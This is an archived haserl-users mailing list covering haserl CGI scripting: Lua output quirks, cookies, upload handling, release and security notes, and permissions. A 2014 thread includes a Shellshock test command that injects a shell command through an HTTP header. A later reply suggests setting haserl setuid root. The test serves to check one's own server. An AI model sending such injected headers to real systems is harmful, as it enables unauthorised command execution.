haserl-users Mailing List for Haserl
Brought to you by:
nangel
Menu
▾
▴
haserl-users — General discussion list
You can subscribe to this list here.
| 2004 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(1) |
Oct
(1) |
Nov
(3) |
Dec
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2005 |
Jan
(3) |
Feb
(8) |
Mar
(2) |
Apr
|
May
(3) |
Jun
(4) |
Jul
|
Aug
(6) |
Sep
|
Oct
(11) |
Nov
(3) |
Dec
|
| 2006 |
Jan
(1) |
Feb
(4) |
Mar
|
Apr
|
May
(1) |
Jun
|
Jul
|
Aug
|
Sep
(9) |
Oct
|
Nov
|
Dec
|
| 2007 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
(11) |
Jun
(10) |
Jul
(51) |
Aug
(7) |
Sep
(33) |
Oct
(3) |
Nov
|
Dec
(1) |
| 2008 |
Jan
(4) |
Feb
(12) |
Mar
(9) |
Apr
(11) |
May
(3) |
Jun
|
Jul
|
Aug
(3) |
Sep
|
Oct
(11) |
Nov
|
Dec
(8) |
| 2009 |
Jan
(4) |
Feb
(4) |
Mar
|
Apr
(5) |
May
(2) |
Jun
|
Jul
(1) |
Aug
|
Sep
(3) |
Oct
(9) |
Nov
|
Dec
(3) |
| 2010 |
Jan
(7) |
Feb
|
Mar
(4) |
Apr
|
May
(17) |
Jun
(5) |
Jul
(7) |
Aug
(3) |
Sep
(2) |
Oct
(2) |
Nov
|
Dec
|
| 2011 |
Jan
|
Feb
|
Mar
(1) |
Apr
(3) |
May
(1) |
Jun
|
Jul
|
Aug
|
Sep
(2) |
Oct
|
Nov
|
Dec
(6) |
| 2012 |
Jan
(7) |
Feb
(4) |
Mar
|
Apr
(1) |
May
(2) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
(2) |
Nov
|
Dec
(1) |
| 2013 |
Jan
(4) |
Feb
(1) |
Mar
|
Apr
|
May
|
Jun
(1) |
Jul
(8) |
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2014 |
Jan
(2) |
Feb
|
Mar
(12) |
Apr
|
May
|
Jun
(3) |
Jul
|
Aug
|
Sep
(3) |
Oct
|
Nov
|
Dec
|
| 2015 |
Jan
|
Feb
(1) |
Mar
(1) |
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
(2) |
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2022 |
Jan
(4) |
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Ralph S. <ra...@ne...> - 2022-01-27 16:13:45
|
Hi Nico, On Wed, Jan 26, 2022 at 11:12:06PM +0100, Nico de Haer wrote: > >Looks like lua itself is eating the newline. Indeed, that seems to be what is happening. Afraid I do not know lua well enough to explain why it behaves that way. When using regular shell (eg. without --shell=lua) then the missing newline does appear. Regards, Ralph |
|
From: Nico de H. <nic...@gm...> - 2022-01-26 22:12:24
|
Hi Ralph, As you point out the EVAL translates to 'echo -n' and does not include a newline - this is what I expect and I think that that is the way it should work. My point is... why is the newline after the <%= foo %> no longer there. Looking at the output with the debug flag set: ~~~~~ code ~~~~~ io.write([=[content-type: text/plain ]=]) foo="bar" io.write([=[ The value of foo is ]=]) io.write(tostring( foo )) io.write([=[. Note that this in the middle of a line Wat is the value of foo? ]=]) io.write(tostring( foo )) io.write([=[ Hey, where did my newline go? ]=]) ~~~~~~~~~~~~~~~ Looks like the io.write starts with a newline but that newline does not end up in the output. I ran some extra tests using just lua and I found that these two bits of lua (Note the extra newline at the start of the 2nd io.write) give the same output: ~~~~~~~~~~~~~~~ io.write([=[This is a line ]=]) io.write([=[ This is a line ]=]) ~~~~~~~~~~~~~~~ Looks like lua itself is eating the newline. Regards, Nico |
|
From: Ralph S. <ra...@ne...> - 2022-01-26 21:08:51
|
Hi Nico, On Wed, Jan 26, 2022 at 04:40:33PM +0100, Nico de Haer wrote: > >I expected to get three lines of output but I got two. Is this >expected behavior? I'm not the maintainer, just a user - but to me this is correct and therefore expected behaviour. The man page indicates that the EVAL construct <%= expr %> is shorthand for "echo expr", but it actually expands to "echo -n expr". You can see this by adding --debug flag when calling haserl. This will cause it to output all the shell statements, rather than executing them. I find this quite helpful when trying to figure out what it is doing. In the case of using shell=lua, it looks like it expands to: io.write(tostring( foo )) without adding any newline, just like "echo -n". So it seems consistent at least. Best regards, -Ralph |
|
From: Nico de H. <nic...@gm...> - 2022-01-26 15:40:55
|
Hi all, The following haserl (version 0.9.36) / lua code does not create the results that I expected: ~~~~~ code ~~~~~ #!/usr/bin/haserl --shell=lua content-type: text/plain <% foo="bar" %> The value of foo is <%= foo %>. Note that this in the middle of a line What is the value of foo? <%= foo %> Hey, where did my newline go? ~~~~~~~~~~~~~~~ This results in the following output: ~~~~~ output ~~~~~ The value of foo is bar. Note that this in the middle of a line What is the value of foo? barHey, where did my newline go? ~~~~~~~~~~~~~~~ I expected to get three lines of output but I got two. Is this expected behavior? Regards, Nico |
|
From: Ralph S. <ra...@ne...> - 2019-02-24 01:12:29
|
Hi Daniel, >Hello, I start with shell and haserl. I am looking for three days to >create a cookie shell without using javascript. > >If someone can help me by explaining how to do it, I will be happy to >deepen my knowledge. I'm not quite sure what you mean by "cookie shell". Can you explain? In general, there are two parts to using cookies: 1) creating the cookie 2) retrieving the cookie in later requests Regardless of which programming language you use, cookies are transferred the same way: as part of the HTTP protocol. I would recommend the Mozilla developer documentation as a good reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies In a Haserl script, you create a cookie by including "Set-Cookie" in the HTTP headers. An example would be: #!/usr/bin/haserl Content-type: text/html Set-Cookie: foo=bar <html><body> <h1>heading</h1> </body></html> Later on, in a subsequent request, you can obtain the value of the cookie using the variable $COOKIE_foo. #!/usr/bin/haserl Content-type: text/html <html><body> <p>Cookie value is <% echo $COOKIE_foo %>.</p> </body></html> Note that in both cases, the HTTP headers should really be using CR+LF line termination. See the section "RFC-2616 conformance" of the haserl manual at http://haserl.sourceforge.net/manpage.html for details. Regards, Ralph |
|
From: <dan...@la...> - 2019-02-23 17:46:11
|
Hello, I start with shell and haserl. I am looking for three days to create a cookie shell without using javascript. If someone can help me by explaining how to do it, I will be happy to deepen my knowledge. Thanks in advance. excuse me for my bad english. |
|
From: Daniel G. <gr...@su...> - 2015-03-30 22:36:17
|
I'm doing a new site with file uploading, and couldn't figure out why the uploaded files were disappearing. I'd been following through the manpage section on "Uploading a File", and took out the "<% rm -f $HASERL_uploadfile_path %>" so as to leave the uploaded file behind, but it was still disappearing. Then I read in another place in the manpage that the uploaded file is automatically deleted when the Haserl script ends. This makes sense from a functional viewpoint, but the example strongly implies the exact opposite. Suggestion: change the manpage example to NOT explicitly delete the uploaded file, and change the "Don't worry, the file has just been deleted from the web server" text in the generated web page to "Don't worry, the file is automatically deleted once the script ends". My $0.02, Dan Daniel T. Griscom, Suitable Systems 1 Centre Street, Suite 204, Wakefield, MA 01880-2400 (781) 665-0053 gr...@su... http://www.suitable.com/ |
|
From: Nathan A. <na...@us...> - 2015-02-16 00:15:35
|
Haserl 0.9.34 is now available. * Haserl is now compatible with Lua 5.3 (in addition to 5.1, and 5.2) * Back in July 2014 Victor Cook sent in a patch regarding processing headers in rfc2388.c Basically there was a situation where the location of the CR/LF could cause unpredictable results with the processing of the rest of the message. Apologies for taking so long, Victor! |
|
From: Daniel G. <gr...@su...> - 2014-09-28 12:58:31
|
Thanks for the detailed response: it was really helpful. We're using thttpd. My own testing shows that there are a lot of hoops for the attacker to jump through, and he's flying blind (no output), but there's likely enough attack surface area for someone who can play with one of our boxes to be able to break into another one.
Thanks,
Dan
At 2:59 PM -0400 9/27/14, Nathan Angelacos wrote:
>Daniel,
>
>If you are really using bash, then unfortunately you are vulnerable.
>
>To test, use curl to add a bogus header:
>
>curl -H 'X-SHELLSHOCK: () { :; }; /usr/bin/touch /tmp/owned'
>http://example.com/haserl.cgi
>
>
>In my case, haserl.cgi is:
>
>#!/usr/bin/haserl --shell=/bin/bash
><%
>echo -e "Content-type: text/plain\r\n\r\n"
>
>env
>
>if [ -e /tmp/owned ]; then
> echo "vulnerable"
> rm /tmp/owned
>fi
>%>
>
>In my testing, the cgi segfaulted (mini_httpd) or returned a 500 error
>(lighttpd), but the /tmp/owned file was created - so that on subsequent
>requests (without the -H option) the last line of the cgi was "vulnerable".
>
>> Like many (most?) Haserl users, our company uses it to build embedded web CGIs by having it invoke a shell script using the default /bin/sh. /bin/sh, of course, is actually bash, which is in the news these days as the latest black hat vector.
>
>Debian and ubuntu use "dash" as the /bin/sh shell. I think its only
>user accounts that specifically get bash
>
>Run 'ls -l /bin/sh'
>
>to see what your systems use. That's why I had to explicitly specify
>the shell in the cgi. When I use the default /bin/sh on ubuntu, the
>attack fails.
>
>
>
>
>
>
>------------------------------------------------------------------------------
>Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
>Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS Reports
>Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
>Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
>http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
>_______________________________________________
>Haserl-users mailing list
>Has...@li...
>https://lists.sourceforge.net/lists/listinfo/haserl-users
--
Daniel T. Griscom gr...@su...
Suitable Systems http://www.suitable.com/
1 Centre Street, Suite 204 (781) 665-0053
Wakefield, MA 01880-2400
|
|
From: Nathan A. <na...@us...> - 2014-09-27 19:16:05
|
Daniel,
If you are really using bash, then unfortunately you are vulnerable.
To test, use curl to add a bogus header:
curl -H 'X-SHELLSHOCK: () { :; }; /usr/bin/touch /tmp/owned'
http://example.com/haserl.cgi
In my case, haserl.cgi is:
#!/usr/bin/haserl --shell=/bin/bash
<%
echo -e "Content-type: text/plain\r\n\r\n"
env
if [ -e /tmp/owned ]; then
echo "vulnerable"
rm /tmp/owned
fi
%>
In my testing, the cgi segfaulted (mini_httpd) or returned a 500 error
(lighttpd), but the /tmp/owned file was created - so that on subsequent
requests (without the -H option) the last line of the cgi was "vulnerable".
> Like many (most?) Haserl users, our company uses it to build embedded web CGIs by having it invoke a shell script using the default /bin/sh. /bin/sh, of course, is actually bash, which is in the news these days as the latest black hat vector.
Debian and ubuntu use "dash" as the /bin/sh shell. I think its only
user accounts that specifically get bash
Run 'ls -l /bin/sh'
to see what your systems use. That's why I had to explicitly specify
the shell in the cgi. When I use the default /bin/sh on ubuntu, the
attack fails.
|
|
From: Daniel G. <gr...@su...> - 2014-09-27 17:01:18
|
Like many (most?) Haserl users, our company uses it to build embedded web CGIs by having it invoke a shell script using the default /bin/sh. /bin/sh, of course, is actually bash, which is in the news these days as the latest black hat vector. I understand that if I'd had my web server (thttpd) directly invoke a /bin/bash script then my site would be vulnerable to Shellshock. However, I'm not clear on what happens if thttpd invokes Haserl, which does its text processing and then invokes /bin/bash? Can the attack get through? Any idea how I'd test? Thanks, Dan -- Daniel T. Griscom gr...@su... Suitable Systems http://www.suitable.com/ 1 Centre Street, Suite 204 (781) 665-0053 Wakefield, MA 01880-2400 |
|
From: Hinko K. <hin...@gm...> - 2014-06-17 11:59:01
|
Hi Nathan, you are right. Newer version from official web page, 0.9.27, works as expected! Thank you! /Hinko On 17 Jun 2014, at 13:39, Nathan Angelacos <na...@us...> wrote: > Hinko, > > On 06/17/2014 02:49 AM, Hinko Kocevar wrote: >> Hi, >> >> I tried haserl package from MAC ports (version 0.8.0) on Max OS X Mavericks. > > Version 0.8.0 is very, very old. It does not support <% %> syntax, but used <? ?> > > The man page on the website is for the newer 0.9.x series. > > If at all possible, try to use the 0.9.33 version instead. If you must use 0.8.0, make sure you use the man page included in the 0.8.0 package. There's alot missing in that version. > > HtH > |
|
From: Nathan A. <na...@us...> - 2014-06-17 11:39:46
|
Hinko, On 06/17/2014 02:49 AM, Hinko Kocevar wrote: > Hi, > > I tried haserl package from MAC ports (version 0.8.0) on Max OS X Mavericks. Version 0.8.0 is very, very old. It does not support <% %> syntax, but used <? ?> The man page on the website is for the newer 0.9.x series. If at all possible, try to use the 0.9.33 version instead. If you must use 0.8.0, make sure you use the man page included in the 0.8.0 package. There's alot missing in that version. HtH |
|
From: Nathan A. <na...@us...> - 2014-06-13 17:08:53
|
Stephen Röttger reported a number of security bugs, the most serious of
which is a potential heap overflow in sliding_buffer.c (file uploads).
There is a potential for remote code execution.
At the same time, I've made an *experimental* change to allow RESTful
API's possible:
* PUT and DELETE methods are handled by the POST and GET handlers.
* For mostly historical reasons, data on the URI is still called
GET.<var>, and data in the body is named POST.<var>
* If the Content-Type is not "application/x-www-form-urlencoded", Haserl
won't try to urldecode the POST contents - it will just put the body in
POST.body verbatim.
For example:
curl -X PUT --header "Content-Type: application/json" -d '{ "foo": 1,
"bar": 3}' localhost://cgi-bin/x
will result in a lua variable:
POST.body={ "foo": 1, "bar": 3}
Again, this is experimental.
Thanks again to Stephen for the report!
Specifically the report was:
-------
>
> ==Medium==
> Heap overflow in sliding_buffer.c +130 (s_buffer_read)
>
> the length field will be negative if strlen(matchstr) is greater than the buffer or if read returned less than strlen(matchstr) bytes
> leads to: sbuf->ptr < sbuf->buf (the current pointer points to an address before the buffer’s beginning)
> line 91: will result in a wrong length calculation bigger than the buffer itself
> line 94: memmove heap overflow which might lead to remote code execution
> If this bug can be triggered depends on the web server configuration:
> if the attacker can control number of bytes returned by read (e.g. if the socket is passed to haserl)
> if the web server accepts HTTP headers bigger than 128kb (this should be possible in lighttpd, if the tcp window size is >= 64kb)
>
> ==Low==
> rfc2388.c +462 (rfc2388_handler)
>
> free called on uninitialized variable
>
> common.c +249 (buffer_add)
>
> potential integer overflow leading to out of bounds memcpy
> exploitation improbable, since memcpy will segfault on a big size value
>
> common.c +258 (buffer_add)
>
> missing check for return value of realloc
> consecutive write to NULL+user controlled offset
> user controlled offset probably not big enough to point to mapped memory
>
> rfc2388.c +139 & +148 (mime_tag_add)
>
> missing NULL checks for return value of strchr for closing quotes
> could lead to information disclosure, but improbable
> if str pointer is > INT_MAX
> will malloc (-1 * (int) str) bytes and memcpy from str
|
|
From: Ralph S. <ra...@ne...> - 2014-03-20 19:58:14
|
On Thu, Mar 20, 2014 at 08:30:51PM +0100, Peter Korsgaard wrote: > > > For many systems, when the shell is bash, and both echo/printf > > are built-ins, there is likely not much difference. However, > > I am running haserl on an embedded system using 'ash' shell > > (from busybox). It has an option to make 'echo' a builtin, and > > I have that enabled, but there is no builtin version of printf. > > But ash does have an option for printf as a builtin: > > grep ASH_BUILTIN_ shell/Config.in > config ASH_BUILTIN_ECHO > config ASH_BUILTIN_PRINTF > config ASH_BUILTIN_TEST Hi Peter, Thanks, you are right. I am using an old version of ash, from busybox-1.2.1 (yes, 20 versions behind...), which lacks this option. I shall have to look at updating "the whole world"... -Ralph |
|
From: Peter K. <pe...@ko...> - 2014-03-20 19:31:01
|
>>>>> "Ralph" == Ralph Siemsen <ra...@ne...> writes: > Hi Nathan et al, > I recently upgraded to 0.9.32 and found a fairly significant > performance regression. I've traced it down to a change done > in 0.9.28 when 'echo' was replaced with 'printf' in the > generated shell script. > For many systems, when the shell is bash, and both echo/printf > are built-ins, there is likely not much difference. However, > I am running haserl on an embedded system using 'ash' shell > (from busybox). It has an option to make 'echo' a builtin, and > I have that enabled, but there is no builtin version of printf. But ash does have an option for printf as a builtin: grep ASH_BUILTIN_ shell/Config.in config ASH_BUILTIN_ECHO config ASH_BUILTIN_PRINTF config ASH_BUILTIN_TEST -- Bye, Peter Korsgaard |
|
From: Ralph S. <ra...@ne...> - 2014-03-20 18:50:49
|
Hi Nathan et al, I recently upgraded to 0.9.32 and found a fairly significant performance regression. I've traced it down to a change done in 0.9.28 when 'echo' was replaced with 'printf' in the generated shell script. For many systems, when the shell is bash, and both echo/printf are built-ins, there is likely not much difference. However, I am running haserl on an embedded system using 'ash' shell (from busybox). It has an option to make 'echo' a builtin, and I have that enabled, but there is no builtin version of printf. Consequently, a script that used to execute in 0.25sec now takes over 4 seconds to execute. Almost all of the script is verbatim text that just gets echoed. Given that haserl seems targetted towards small embedded systems, perhaps the decision to switch from echo to printf might warrant some additonal discussion? Regards, -Ralph |
|
From: Angelo D. <ang...@gm...> - 2014-03-07 17:26:59
|
On 07/03/2014 16:07, Nathan Angelacos wrote: > Alternatively, you could try this (at least to test) > > > If you make haserl as suid root: > > chown root:root /usr/bin/haserl > chmod 4111 /usr/bin/haserl > chown root:root /var/www/myscript > > > Then haserl will run the script with the permissions of the owner /of > the script/. You won't need the sudo in the script then - you'll > already be running as root. > > You'll need to be /very careful/ to make sure all your other scripts are > owned by www-data though! Ok i solved, sudo-enabled commands into sudoers need also to have parameters enabled there, i need actually Cmnd_Alias SYSTEM = /bin/kill -k *, other commands ... What you suggest for all the commands i have to issue from www-data (cgi) ? For now i am using this sudo way, but i don't know if is a good way to go. Better maybe enable some scripts instead of commands ? Thanks angelo > > > > > > ------------------------------------------------------------------------------ > Subversion Kills Productivity. Get off Subversion & Make the Move to Perforce. > With Perforce, you get hassle-free workflows. Merge that actually works. > Faster operations. Version large binaries. Built-in WAN optimization and the > freedom to use Git, Perforce or both. Make the move to Perforce. > http://pubads.g.doubleclick.net/gampad/clk?id=122218951&iu=/4140/ostg.clktrk > _______________________________________________ > Haserl-users mailing list > Has...@li... > https://lists.sourceforge.net/lists/listinfo/haserl-users |
|
From: Nathan A. <na...@us...> - 2014-03-07 15:23:02
|
Alternatively, you could try this (at least to test) If you make haserl as suid root: chown root:root /usr/bin/haserl chmod 4111 /usr/bin/haserl chown root:root /var/www/myscript Then haserl will run the script with the permissions of the owner /of the script/. You won't need the sudo in the script then - you'll already be running as root. You'll need to be /very careful/ to make sure all your other scripts are owned by www-data though! |
|
From: Daniel G. <gr...@su...> - 2014-03-07 15:01:28
|
At 3:56 PM +0100 3/7/14, Angelo Dureghello wrote: >Dear Daniel and all, > >On 07/03/2014 11:50, Daniel Griscom wrote: >> Some more tips: >> >> - Do you really have the commands quoted by backticks? I'm guessing >> it would work, but it could also be causing problems. >> >> - I didn't mean to echo the output of the sudo (although that might >> have been useful), but the result or return value. Try >> >> echo "sudo result is $?" >> >> right after the sudo command > >Done, >i get >id is : uid=33(www-data) gid=33(www-data) >groups=29(audio),33(www-data),38(led) > >sudo result is 1 non-zero means it failed. > >> - You can run haserl scripts from the command line and watch the >> output, so you don't have to involve the web server. (The results in >> this case might be different, but it might be helpful.) >already tested, if i su www-data, then call /usr/bin/haserl with same >script, kill works perfect. > >Issue seems strangely only related when lighttpd is involved. No, it's surely some sort of permissions issue, which depends exactly on who's doing the executing. Solve that and you're done, but until then, not. Dan > >> cat output >>> >>> `sudo /usr/kill -9 1593 > output` >>> >>> echo "result is " >>> cat output >>> >>> %> >>> >>> >>> I get: >>> >>> id is : uid=33(www-data) gid=33(www-data) >>> groups=29(audio),33(www-data),38(led) >>> result is >>> >>> >>> Empy, kill silently fail. Strange thing is that if i su to www-data on >>> the console, pass the same command "sudo /usr/kill -9 1593" to haserl >>> wrapper, >>> i have the process correctly killed. >>> >>>> At 6:51 PM +0100 3/6/14, Angelo Dureghello wrote: >>>>> Dear, >>>>> >>>>> i am working on an embedded linux, arm based board, and using very >>>>> nice haserl tool. >>>>> >>>>> I am trying to issue a "kill -9" from a .cgi passed to haser_wrapper. >>>>> >>>>> this is the script of the "test.cgi" : >>>>> >>>>> <% . /usr/local/lib/cgi/generic.sh; print_http_hdr %> >>>>> <% >>>>> echo test kill >>>>> >>>>> sudo /usr/kill -9 1593 >>>>> %> >>>>> >>>>> >>>>> If i work on console and pass the file to haserl_wrapper, it works, >>>>> the process is killed properly. >>>> >From web (using actually lighttpd), echo is redirected as web output >>>>> and kill doesn't work. >>>>> >>>>> Every help is really appreciated. >>>>> >>>>> Thanks, >>>>> Angelo >>>>> >>>>> >>>>> >>>>>------------------------------------------------------------------------------ >>>>> Subversion Kills Productivity. Get off Subversion & Make the Move >>>>> to Perforce. >>>>> With Perforce, you get hassle-free workflows. Merge that >>>>>actually works. >>>>> Faster operations. Version large binaries. Built-in WAN >>>>> optimization and the >>>>> freedom to use Git, Perforce or both. Make the move to Perforce. >>>>> >>>>> >>>>>http://pubads.g.doubleclick.net/gampad/clk?id=122218951&iu=/4140/ostg.clktrk >>>>> _______________________________________________ >>>>> Haserl-users mailing list >>>>> Has...@li... >>>>> https://lists.sourceforge.net/lists/listinfo/haserl-users >>> >>> >>>------------------------------------------------------------------------------ >>> Subversion Kills Productivity. Get off Subversion & Make the Move >>>to Perforce. >>> With Perforce, you get hassle-free workflows. Merge that actually works. >>> Faster operations. Version large binaries. Built-in WAN >>>optimization and the >>> freedom to use Git, Perforce or both. Make the move to Perforce. >>> >>>http://pubads.g.doubleclick.net/gampad/clk?id=122218951&iu=/4140/ostg.clktrk >>> _______________________________________________ >>> Haserl-users mailing list >>> Has...@li... >>> https://lists.sourceforge.net/lists/listinfo/haserl-users >> > > >------------------------------------------------------------------------------ >Subversion Kills Productivity. Get off Subversion & Make the Move to Perforce. >With Perforce, you get hassle-free workflows. Merge that actually works. >Faster operations. Version large binaries. Built-in WAN optimization and the >freedom to use Git, Perforce or both. Make the move to Perforce. >http://pubads.g.doubleclick.net/gampad/clk?id=122218951&iu=/4140/ostg.clktrk >_______________________________________________ >Haserl-users mailing list >Has...@li... >https://lists.sourceforge.net/lists/listinfo/haserl-users -- Daniel T. Griscom gr...@su... Suitable Systems http://www.suitable.com/ 1 Centre Street, Suite 204 (781) 665-0053 Wakefield, MA 01880-2400 |
|
From: Angelo D. <ang...@gm...> - 2014-03-07 14:56:31
|
Dear Daniel and all, On 07/03/2014 11:50, Daniel Griscom wrote: > Some more tips: > > - Do you really have the commands quoted by backticks? I'm guessing > it would work, but it could also be causing problems. > > - I didn't mean to echo the output of the sudo (although that might > have been useful), but the result or return value. Try > > echo "sudo result is $?" > > right after the sudo command Done, i get id is : uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data),38(led) sudo result is 1 > - You can run haserl scripts from the command line and watch the > output, so you don't have to involve the web server. (The results in > this case might be different, but it might be helpful.) already tested, if i su www-data, then call /usr/bin/haserl with same script, kill works perfect. Issue seems strangely only related when lighttpd is involved. > > Dan > > > At 9:59 AM +0100 3/7/14, Angelo Dureghello wrote: >> Hello, >> >> thanks for the support >> >> On 06/03/2014 19:04, Daniel Griscom wrote: >>> I doubt your web server executes scripts with the permissions >>> necessary to run sudo without a password (I certainly hope not). >>> >>> In any case, I'd put in some test echo statements that give the ID of >>> the process when the script is executed, and perhaps echoed the >>> return value of the sudo (i.e. did it fail?). >>> >>> You might want to make an external script (kept OUTSIDE of the web >>> tree) that is SUID root and does what you need it to. Then have this >>> script execute the SUID one. Even that's a bit iffy in the security >>> department, though. >>> >>> >>> Dan >> Dear Dan, >> >> thanks, i am still stucked on this, >> >> i have set sudo to allow only certain commands to www-data for now, i >> can also >> allow a single script only, no problem for that. >> >> Well i have several .sh scripts executed through llighttpd/haserl, it is >> strange, >> several other commands, also with sudo, are executed fine. >> >> Now i tried: >> >> <% . /usr/local/lib/cgi/generic.sh; print_http_hdr %> >> <% >> >> `id > output` >> >> echo "id is : " >> cat output >> >> `sudo /usr/kill -9 1593 > output` >> >> echo "result is " >> cat output >> >> %> >> >> >> I get: >> >> id is : uid=33(www-data) gid=33(www-data) >> groups=29(audio),33(www-data),38(led) >> result is >> >> >> Empy, kill silently fail. Strange thing is that if i su to www-data on >> the console, pass the same command "sudo /usr/kill -9 1593" to haserl >> wrapper, >> i have the process correctly killed. >> >>> At 6:51 PM +0100 3/6/14, Angelo Dureghello wrote: >>>> Dear, >>>> >>>> i am working on an embedded linux, arm based board, and using very >>>> nice haserl tool. >>>> >>>> I am trying to issue a "kill -9" from a .cgi passed to haser_wrapper. >>>> >>>> this is the script of the "test.cgi" : >>>> >>>> <% . /usr/local/lib/cgi/generic.sh; print_http_hdr %> >>>> <% >>>> echo test kill >>>> >>>> sudo /usr/kill -9 1593 >>>> %> >>>> >>>> >>>> If i work on console and pass the file to haserl_wrapper, it works, >>>> the process is killed properly. >>> >From web (using actually lighttpd), echo is redirected as web output >>>> and kill doesn't work. >>>> >>>> Every help is really appreciated. >>>> >>>> Thanks, >>>> Angelo >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> Subversion Kills Productivity. Get off Subversion & Make the Move >>>> to Perforce. >>>> With Perforce, you get hassle-free workflows. Merge that actually works. >>>> Faster operations. Version large binaries. Built-in WAN >>>> optimization and the >>>> freedom to use Git, Perforce or both. Make the move to Perforce. >>>> >>>> http://pubads.g.doubleclick.net/gampad/clk?id=122218951&iu=/4140/ostg.clktrk >>>> _______________________________________________ >>>> Haserl-users mailing list >>>> Has...@li... >>>> https://lists.sourceforge.net/lists/listinfo/haserl-users >> >> ------------------------------------------------------------------------------ >> Subversion Kills Productivity. Get off Subversion & Make the Move to Perforce. >> With Perforce, you get hassle-free workflows. Merge that actually works. >> Faster operations. Version large binaries. Built-in WAN optimization and the >> freedom to use Git, Perforce or both. Make the move to Perforce. >> http://pubads.g.doubleclick.net/gampad/clk?id=122218951&iu=/4140/ostg.clktrk >> _______________________________________________ >> Haserl-users mailing list >> Has...@li... >> https://lists.sourceforge.net/lists/listinfo/haserl-users > |
|
From: Daniel G. <gr...@su...> - 2014-03-07 11:51:33
|
Some more tips: - Do you really have the commands quoted by backticks? I'm guessing it would work, but it could also be causing problems. - I didn't mean to echo the output of the sudo (although that might have been useful), but the result or return value. Try echo "sudo result is $?" right after the sudo command - You can run haserl scripts from the command line and watch the output, so you don't have to involve the web server. (The results in this case might be different, but it might be helpful.) Dan At 9:59 AM +0100 3/7/14, Angelo Dureghello wrote: >Hello, > >thanks for the support > >On 06/03/2014 19:04, Daniel Griscom wrote: >> I doubt your web server executes scripts with the permissions >> necessary to run sudo without a password (I certainly hope not). >> >> In any case, I'd put in some test echo statements that give the ID of >> the process when the script is executed, and perhaps echoed the >> return value of the sudo (i.e. did it fail?). >> >> You might want to make an external script (kept OUTSIDE of the web >> tree) that is SUID root and does what you need it to. Then have this >> script execute the SUID one. Even that's a bit iffy in the security >> department, though. >> >> >> Dan > >Dear Dan, > >thanks, i am still stucked on this, > >i have set sudo to allow only certain commands to www-data for now, i >can also >allow a single script only, no problem for that. > >Well i have several .sh scripts executed through llighttpd/haserl, it is >strange, >several other commands, also with sudo, are executed fine. > >Now i tried: > ><% . /usr/local/lib/cgi/generic.sh; print_http_hdr %> ><% > >`id > output` > >echo "id is : " >cat output > >`sudo /usr/kill -9 1593 > output` > >echo "result is " >cat output > >%> > > >I get: > >id is : uid=33(www-data) gid=33(www-data) >groups=29(audio),33(www-data),38(led) >result is > > >Empy, kill silently fail. Strange thing is that if i su to www-data on >the console, pass the same command "sudo /usr/kill -9 1593" to haserl >wrapper, >i have the process correctly killed. > >> >> At 6:51 PM +0100 3/6/14, Angelo Dureghello wrote: >>> Dear, >>> >>> i am working on an embedded linux, arm based board, and using very >>> nice haserl tool. >>> >>> I am trying to issue a "kill -9" from a .cgi passed to haser_wrapper. >>> >>> this is the script of the "test.cgi" : >>> >>> <% . /usr/local/lib/cgi/generic.sh; print_http_hdr %> >>> <% >>> echo test kill >>> >>> sudo /usr/kill -9 1593 >>> %> >>> >>> >>> If i work on console and pass the file to haserl_wrapper, it works, >>> the process is killed properly. >> >From web (using actually lighttpd), echo is redirected as web output >>> and kill doesn't work. >>> >>> Every help is really appreciated. >>> >>> Thanks, >>> Angelo >>> >>> >>>------------------------------------------------------------------------------ >>> Subversion Kills Productivity. Get off Subversion & Make the Move >>>to Perforce. >>> With Perforce, you get hassle-free workflows. Merge that actually works. >>> Faster operations. Version large binaries. Built-in WAN >>>optimization and the >>> freedom to use Git, Perforce or both. Make the move to Perforce. >>> >>>http://pubads.g.doubleclick.net/gampad/clk?id=122218951&iu=/4140/ostg.clktrk >>> _______________________________________________ >>> Haserl-users mailing list >>> Has...@li... >>> https://lists.sourceforge.net/lists/listinfo/haserl-users >> > > >------------------------------------------------------------------------------ >Subversion Kills Productivity. Get off Subversion & Make the Move to Perforce. >With Perforce, you get hassle-free workflows. Merge that actually works. >Faster operations. Version large binaries. Built-in WAN optimization and the >freedom to use Git, Perforce or both. Make the move to Perforce. >http://pubads.g.doubleclick.net/gampad/clk?id=122218951&iu=/4140/ostg.clktrk >_______________________________________________ >Haserl-users mailing list >Has...@li... >https://lists.sourceforge.net/lists/listinfo/haserl-users -- Daniel T. Griscom gr...@su... Suitable Systems http://www.suitable.com/ 1 Centre Street, Suite 204 (781) 665-0053 Wakefield, MA 01880-2400 |
|
From: Angelo D. <ang...@gm...> - 2014-03-07 08:59:46
|
Hello, thanks for the support On 06/03/2014 19:04, Daniel Griscom wrote: > I doubt your web server executes scripts with the permissions > necessary to run sudo without a password (I certainly hope not). > > In any case, I'd put in some test echo statements that give the ID of > the process when the script is executed, and perhaps echoed the > return value of the sudo (i.e. did it fail?). > > You might want to make an external script (kept OUTSIDE of the web > tree) that is SUID root and does what you need it to. Then have this > script execute the SUID one. Even that's a bit iffy in the security > department, though. > > > Dan Dear Dan, thanks, i am still stucked on this, i have set sudo to allow only certain commands to www-data for now, i can also allow a single script only, no problem for that. Well i have several .sh scripts executed through llighttpd/haserl, it is strange, several other commands, also with sudo, are executed fine. Now i tried: <% . /usr/local/lib/cgi/generic.sh; print_http_hdr %> <% `id > output` echo "id is : " cat output `sudo /usr/kill -9 1593 > output` echo "result is " cat output %> I get: id is : uid=33(www-data) 